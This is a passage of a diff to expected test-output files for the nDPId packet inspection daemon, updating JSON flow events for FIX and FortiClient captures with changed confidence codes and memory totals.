{"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1261,"packets-processed":1261,"total-skipped-flows":0,"total-l4-payload-len":37586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1493755132120} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1261/1261 @@ -81,9 +81,9 @@ ~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5942248 bytes -~~ total memory freed........: 5942248 bytes -~~ total allocations/frees...: 119431/119431 +~~ total memory allocated....: 6075882 bytes +~~ total memory freed........: 6075882 bytes +~~ total allocations/frees...: 122193/122193 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 676 chars diff --git a/test/results/fix2.pcap.out b/test/results/fix2.pcap.out index 05e95cf5b..77e13ed16 100644 
--- a/test/results/fix2.pcap.out +++ b/test/results/fix2.pcap.out 
@@ -6,12 +6,12 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"} 
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":3049,"packets-processed":3046,"total-skipped-flows":0,"total-l4-payload-len":67956,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1614758889595} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3049/3046 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5962933 bytes -~~ total memory freed........: 5962933 bytes -~~ total allocations/frees...: 121166/121166 +~~ total memory allocated....: 6096567 bytes +~~ total memory freed........: 6096567 bytes +~~ total allocations/frees...: 123928/123928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 672 chars diff --git a/test/results/forticlient.pcap.out b/test/results/forticlient.pcap.out index b53978662..e1f3122e8 100644 --- a/test/results/forticlient.pcap.out +++ b/test/results/forticlient.pcap.out 
@@ -4,42 +4,42 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"} 
-01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01121{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 